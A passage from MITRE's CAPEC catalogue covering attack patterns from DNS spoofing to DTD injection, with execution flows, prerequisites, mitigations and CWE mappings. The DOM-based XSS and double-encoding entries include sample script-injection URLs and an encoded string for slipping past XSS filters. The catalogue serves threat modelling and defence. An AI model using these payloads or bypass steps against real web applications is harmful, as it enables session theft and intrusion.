2017-08-04 (Version 2.11)	Updated Attack_Phases, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Examples-Instances, Payload_Activation_Impact, Resources_Required
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Phases, Attacker_Skills_or_Knowledge_Required, Description Summary, Examples-Instances, Payload, Related_Attack_Patterns, Solutions_and_Mitigations
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Consequences, Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Example_Instances
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Description
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Related_Attack_Patterns

CAPEC-598: DNS Spoofing

Attack Pattern ID: 598

Abstraction: Detailed

View customized information:

Description

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	194	Fake the Source of Data

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Engage in Deceptive Interactions

Prerequisites

On/In Path Device

Skills Required

[Level: Low]

To distribute email

Mitigations

Design: Avoid dependence on DNS

Design: Include "hosts file"/IP address in the application

Implementation: Utilize a .onion domain with Tor support

Implementation: DNSSEC

Implementation: DNS-hold-open

Example Instances

Below-Recursive DNS Poisoning: When an On/In-path device between a recursive DNS server and a user sends a malicious ("NXDOMAIN" ("No such domain") code, or DNS A record ) response before a legitimate resolver can.

Above-Recursive DNS Poisoning: When an On/In-path device between an authority server (e.g., government-managed) and a recursive DNS server sends a malicious ("NXDOMAIN" ("No such domain")code, or a DNS record) response before a legitimate resolver can.

Related Weaknesses

General: This attack pattern does not depend upon an underlying system, application, or component weakness and, therefore, cannot be mapped to the Common Weakness Enumeration (CWE) body of knowledge.

References

[REF-477] John-Paul Verkamp and Minaxi Gupta. "Inferring Mechanics of Web Censorship Around the World". USENIX. 2012.

[REF-479] Anonymous. "Towards a Comprehensive Picture of the Great Firewall's DNS Censorship". USENIX. 2014.

Content History

Submissions
Submission Date	Submitter	Organization
2017-01-04 (Version 2.8)	Seamus Tuohy
2017-01-04 (Version 2.8)
Modifications
Modification Date	Modifier	Organization
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Attack_Patterns
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Related_Attack_Patterns
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Description

CAPEC-291: DNS Zone Transfers

Attack Pattern ID: 291

Abstraction: Detailed

View customized information:

Description

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	309	Network Topology Mapping

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

Access to a DNS server that allows Zone transfers.

Resources Required

A client application capable of interacting with the DNS server or a command-line utility or web application that automates DNS interactions.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 2: Scanning, pp. 34. 6th Edition. McGraw Hill. 2009.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Related_Weaknesses

CAPEC-519: Documentation Alteration to Cause Errors in System Design

Attack Pattern ID: 519

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	447	Design Alteration

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Supply Chain
Mechanisms of Attack	Manipulate System Resources
Supply Chain Risks	Design

Prerequisites

Advanced knowledge of software capabilities of a manufacturer's product.

Access to the manufacturer's documentation.

Skills Required

[Level: High]

Ability to read, interpret, and subsequently alter manufacturer's documentation to cause errors in system design.

[Level: High]

Ability to stealthly gain access via remote compromise or physical access to the manufacturer's documentation.

Mitigations

Digitize documents and cryptographically sign them to verify authenticity.

Password protect documents and make them read-only for unauthorized users.

Avoid emailing important documents and configurations.

Ensure deleted files are actually deleted.

Maintain multiple instances of the document across different privileged users for recovery and verification.

Example Instances

During operation, a firewall will restart various subsystems to reload and implement new rules as added by the user. An attacker alters the software design dependencies in the manufacturer's documentation so that under certain predictable conditions the reload will fail to load in rules resulting in a "fail open" state. Once deployed at a victim site, this will allow the attacker to bypass the victim's firewall.

Related Weaknesses

Supply Chain: CWE does not currently cover Supply Chain in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

References

[REF-715] Marie Prokopets. "How To Secure Your Documents". Nira. <https://nira.com/how-to-secure-your-documents/>. URL validated: 2022-02-21.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Related_Attack_Patterns, Typical_Likelihood_of_Exploit
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Mitigations, References

CAPEC-517: Documentation Alteration to Circumvent Dial-down

Attack Pattern ID: 517

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	447	Design Alteration

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Supply Chain
Mechanisms of Attack	Manipulate System Resources
Supply Chain Risks	Design

Prerequisites

Advanced knowledge of internal software and hardware components within manufacturer's development environment.

Access to the manufacturer's documentation.

Skills Required

[Level: High]

Ability to read, interpret, and subsequently alter manufacturer's documentation to prevent dial-down capabilities.

[Level: High]

Ability to stealthly gain access via remote compromise or physical access to the manufacturer's documentation.

Mitigations

Digitize documents and cryptographically sign them to verify authenticity.

Password protect documents and make them read-only for unauthorized users.

Avoid emailing important documents and configurations.

Ensure deleted files are actually deleted.

Maintain backups of the document for recovery and verification.

Example Instances

A product for manufacture exists that contains advanced cryptographic capabilities, including algorithms that are restricted from being shipped to some nations. An attacker from one of the restricted nations alters the documentation to ensure that when the product is manufactured for shipment to a restricted nation, the software compilation steps that normally would prevent the advanced cryptographic capabilities from being included are actually included. When the product is shipped to the attacker's home country, the attacker is able to retrieve and/or use the advanced cryptographic capabilities.

Related Weaknesses

Supply Chain: CWE does not currently cover Supply Chain in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

References

[REF-715] Marie Prokopets. "How To Secure Your Documents". Nira. <https://nira.com/how-to-secure-your-documents/>. URL validated: 2022-02-21.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Related_Attack_Patterns, Typical_Likelihood_of_Exploit
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Mitigations, References

CAPEC-518: Documentation Alteration to Produce Under-performing Systems

Attack Pattern ID: 518

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	447	Design Alteration

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Supply Chain
Mechanisms of Attack	Manipulate System Resources
Supply Chain Risks	Design

Prerequisites

Advanced knowledge of software and hardware capabilities of a manufacturer's product.

Access to the manufacturer's documentation.

Skills Required

[Level: High]

Ability to read, interpret, and subsequently alter manufacturer's documentation to misrepresent system capabilities.

[Level: High]

Ability to stealthly gain access via remote compromise or physical access to the manufacturer's documentation.

Mitigations

Digitize documents and cryptographically sign them to verify authenticity.

Password protect documents and make them read-only for unauthorized users.

Avoid emailing important documents and configurations.

Ensure deleted files are actually deleted.

Maintain backups of the document for recovery and verification.

Separate need-to-know information from system configuration information depending on the user.

Example Instances

A security subsystem involving encryption is a part of a product, but due to the demands of this subsystem during operation, the subsystem only runs when a specific amount of memory and processing is available. An attacker alters the descriptions of the system capabilities so that when deployed with the minimal requirements at the victim location, the encryption subsystem is never operational, leaving the system in a weakened security state.

Related Weaknesses

Supply Chain: CWE does not currently cover Supply Chain in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

References

[REF-715] Marie Prokopets. "How To Secure Your Documents". Nira. <https://nira.com/how-to-secure-your-documents/>. URL validated: 2022-02-21.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Related_Attack_Patterns, Typical_Likelihood_of_Exploit
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Mitigations, References

CAPEC-588: DOM-Based XSS

Attack Pattern ID: 588

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	63	Cross-Site Scripting (XSS)
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	18	XSS Targeting Non-Script Elements
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	32	XSS Through HTTP Query Strings
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	86	XSS Through HTTP Headers
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	198	XSS Targeting Error Pages
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	199	XSS Using Alternate Syntax
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	243	XSS Targeting HTML Attributes
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	244	XSS Targeting URI Placeholders
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	245	XSS Using Doubled Characters
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	247	XSS Using Invalid Characters

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Inject Unexpected Items

Execution Flow

Explore

Survey the application for user-controllable inputs: Using a browser or an automated tool, an adversary follows all public links and actions on a web site. They record all the links, the forms, the resources accessed and all other potential entry-points for the web application.

Techniques
Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
Use a proxy tool to record all links visited during a manual traversal of the web application.
Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.

Experiment

Probe identified potential entry points for DOM-based XSS vulnerability: The adversary uses the entry points gathered in the "Explore" phase as a target list and injects various common script payloads and special characters to determine if an entry point actually represents a vulnerability and to characterize the extent to which the vulnerability can be exploited. Specific to DOM-based XSS, the adversary is looking for areas where input is being used to directly change the DOM.

Techniques
Use a list of XSS probe strings to inject script in parameters of known URLs. If possible, the probe strings contain a unique identifier.
Use a proxy tool to record results of manual input of XSS probes in known URLs.
Use a list of HTML special characters to inject into parameters of known URLs and check if they were properly encoded, replaced, or filtered out.

Craft malicious XSS URL: Once the adversary has determined which parameters are vulnerable to XSS, they will craft a malicious URL containing the XSS exploit. The adversary can have many goals, from stealing session IDs, cookies, credentials, and page content from the victim. In DOM-based XSS, the malicious script might not even be sent to the server, since the victim's browser will manipulate the DOM itself. This can help avoid serve-side detection mechanisms.

Techniques
Change a URL parameter to include a malicious script tag.
Add a URL fragment to alter the value of the expected Document object URL.
Send information gathered from the malicious script to a remote endpoint.

Exploit

Get victim to click URL: In order for the attack to be successful, the victim needs to access the malicious URL.

Techniques
Send a phishing email to the victim containing the malicious URL. This can be hidden in a hyperlink as to not show the full URL, which might draw suspicion.
Put the malicious URL on a public forum, where many victims might accidentally click the link.

Prerequisites

An application that leverages a client-side web browser with scripting enabled.

An application that manipulates the DOM via client-side scripting.

An application that failS to adequately sanitize or encode untrusted input.

Skills Required

[Level: Medium]

Requires the ability to write scripts of some complexity and to inject it through user controlled fields in the system.

Resources Required

None: No specialized resources are required to execute this type of attack.

Consequences

Scope	Impact	Likelihood
Confidentiality	Read Data
Confidentiality Authorization Access Control	Gain Privileges
Confidentiality Integrity Availability	Execute Unauthorized Commands
Integrity	Modify Data

Mitigations

Use browser technologies that do not allow client-side scripting.

Utilize proper character encoding for all output produced within client-site scripts manipulating the DOM.

Ensure that all user-supplied input is validated before use.

Example Instances

Consider a web application that enables or disables some of the fields of a form on the page via the use of a mode parameter provided on the query string.

http://my.site.com/aform.html?mode=full

The application’s client-side code may want to print this mode value to the screen to give the users an understanding of what mode they are in. In this example, JavaScript is used to pull the value from the URL and update the HTML by dynamically manipulating the DOM via a document.write() call.

Notice how the value provided on the URL is used directly with no input validation performed and no output encoding in place. A maliciously crafted URL can thus be formed such that if a victim clicked on the URL, a malicious script would then be executed by the victim’s browser:

http://my.site.com/aform.html?mode=<script>alert('hi');</script>

In some DOM-based attacks, the malicious script never gets sent to the web server at all, thus bypassing any server-side protections that might be in place. Consider the previously used web application that displays the mode value. Since the HTML is being generated dynamically through DOM manipulations, a URL fragment (i.e., the part of a URL after the '#' character) can be used.

http://my.site.com/aform.html#mode=<script>alert('hi')</script>

In this variation of a DOM-based XSS attack, the malicious script will not be sent to the web server, but will instead be managed by the victim's browser and is still available to the client-side script code.

Related Weaknesses

CWE-ID	Weakness Name
79	Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
20	Improper Input Validation
83	Improper Neutralization of Script in Attributes in a Web Page

Taxonomy Mappings

Relevant to the OWASP taxonomy mapping

Entry Name
Reflected DOM Injection

References

[REF-471] Amit Klein. "DOM Based Cross Site Scripting or XSS of the Third Kind". <http://www.webappsec.org/projects/articles/071105.shtml>.

[REF-472] Jakob Kallin and Irene Lobo Valbuena. "A comprehensive tutorial on cross-site scripting". <https://excess-xss.com/>.

[REF-618] "OWASP Web Security Testing Guide". Testing for DOM Based Cross Site Scripting. The Open Web Application Security Project (OWASP). <https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/11-Client-side_Testing/01-Testing_for_DOM-based_Cross_Site_Scripting.html>.

Content History

Submissions
Submission Date	Submitter	Organization
2017-04-15 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-04-15 (Version 2.9)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Resources_Required
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated References, Taxonomy_Mappings
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Execution_Flow
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Example_Instances

CAPEC-120: Double Encoding

Attack Pattern ID: 120

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	267	Leverage Alternate Encoding

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate Data Structures

Execution Flow

Explore

Survey the application for user-controllable inputs: Using a browser, an automated tool or by inspecting the application, an attacker records all entry points to the application.

Techniques
Use a spidering tool to follow and record all links and analyze the web pages to find entry points. Make special note of any links that include parameters in the URL.
Use a proxy tool to record all user input entry points visited during a manual traversal of the web application.
Use a browser to manually explore the website and analyze how it is constructed. Many browsers' plugins are available to facilitate the analysis or automate the discovery.
Manually inspect the application to find entry points.

Experiment

Probe entry points to locate vulnerabilities: Try double-encoding for parts of the input in order to try to get past the filters. For instance, by double encoding certain characters in the URL (e.g. dots and slashes) an adversary may try to get access to restricted resources on the web server or force browse to protected pages (thus subverting the authorization service). An adversary can also attempt other injection style attacks using this attack pattern: command injection, SQL injection, etc.
Techniques
Try to use double-encoding to bypass validation routines.

Prerequisites

The target's filters must fail to detect that a character has been doubly encoded but its interpreting engine must still be able to convert a doubly encoded character to an un-encoded character.

The application accepts and decodes URL string request.

The application performs insufficient filtering/canonicalization on the URLs.

Resources Required

Tools that automate encoding of data can assist the adversary in generating encoded strings.

Mitigations

Assume all input is malicious. Create an allowlist that defines all valid input to the software system based on the requirements specifications. Input that does not match against the allowlist should not be permitted to enter into the system. Test your decoding process against malicious input.

Be aware of the threat of alternative method of data encoding and obfuscation technique such as IP address encoding.

When client input is required from web-based forms, avoid using the "GET" method to submit data, as the method causes the form data to be appended to the URL and is easily manipulated. Instead, use the "POST method whenever possible.

Any security checks should occur after the data has been decoded and validated as correct data format. Do not repeat decoding process, if bad character are left after decoding process, treat the data as suspicious, and fail the validation process.

Refer to the RFCs to safely decode URL.

Regular expression can be used to match safe URL patterns. However, that may discard valid URL requests if the regular expression is too restrictive.

There are tools to scan HTTP requests to the server for valid URL such as URLScan from Microsoft (http://www.microsoft.com/technet/security/tools/urlscan.mspx).

Example Instances

Double Enconding Attacks can often be used to bypass Cross Site Scripting (XSS) detection and execute XSS attacks.:

%253Cscript%253Ealert('This is an XSS Attack')%253C%252Fscript%253E

Since <, <, and / are often sued to perform web attacks, these may be captured by XSS filters. The use of double encouding prevents the filter from working as intended and allows the XSS to bypass dectection. This can allow an adversary to execute malicious code.

Related Weaknesses

CWE-ID	Weakness Name
173	Improper Handling of Alternate Encoding
172	Encoding Error
177	Improper Handling of URL Encoding (Hex Encoding)
181	Incorrect Behavior Order: Validate Before Filter
183	Permissive List of Allowed Inputs
184	Incomplete List of Disallowed Inputs
74	Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
20	Improper Input Validation
697	Incorrect Comparison
692	Incomplete Denylist to Cross-Site Scripting

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Attack_Phases, Description Summary, Resources_Required
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Activation_Zone, Attack_Phases, Attack_Prerequisites, Description Summary, Examples-Instances, Injection_Vector, Payload, Payload_Activation_Impact, Related_Weaknesses, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Mitigations
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Related_Weaknesses
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Example_Instances

CAPEC-620: Drop Encryption Level

Attack Pattern ID: 620

Abstraction: Standard

View customized information:

Description

An attacker forces the encryption level to be lowered, thus enabling a successful attack against the encrypted data.

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	212	Functionality Misuse
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	606	Weakening of Cellular Encryption

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Abuse Existing Functionality

Consequences

Scope	Impact	Likelihood
Access Control	Bypass Protection Mechanism

Related Weaknesses

CWE-ID	Weakness Name
757	Selection of Less-Secure Algorithm During Negotiation ('Algorithm Downgrade')

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1600	Weaken Encryption

Content History

Submissions
Submission Date	Submitter	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)
Modifications
Modification Date	Modifier	Organization
2015-12-07 (Version 2.8)	CAPEC Content Team	The MITRE Corporation
2015-12-07 (Version 2.8)	Updated Related_Attack_Patterns
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Motivation-Consequences
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Related_Attack_Patterns
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-228: DTD Injection

Attack Pattern ID: 228

Abstraction: Detailed

View customized information:

Description

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	250	XML Injection
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	279	SOAP Manipulation
CanPrecede	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	197	Exponential Data Expansion
CanPrecede	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	491	Quadratic Data Expansion

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Inject Unexpected Items

Execution Flow

Explore

Survey the target: Using a browser or an automated tool, an attacker records all instances of web services to process XML requests.
Techniques
Use an automated tool to record all instances of URLs to process XML requests.
Use a browser to manually explore the website and analyze how the application processes XML requests.

Determine use of XML with DTDs: Examine application input to identify XML input that leverage the use of one or more DTDs.

Techniques
Examine any available documentation for the application that discusses expected XML input.
Exercise the application using XML input with and without a DTD specified. Failure without DTD likely indicates use of DTD.

Exploit

Craft and inject XML containg malicious DTD payload:

Techniques
Inject XML expansion attack that creates a Denial of Service impact on the targeted server using its DTD.
Inject XML External Entity (XEE) attack that can cause the disclosure of confidential information, execute abitrary code, create a Denial of Service of the targeted server, or several other malicious impacts.

Prerequisites

The target must be running an XML based application that leverages DTDs.

Mitigations

Design: Sanitize incoming DTDs to prevent excessive expansion or other actions that could result in impacts like resource depletion.

Implementation: Disallow the inclusion of DTDs as part of incoming messages.

Implementation: Use XML parsing tools that protect against DTD attacks.

Related Weaknesses

CWE-ID	Weakness Name
829	Inclusion of Functionality from Untrusted Control Sphere

References

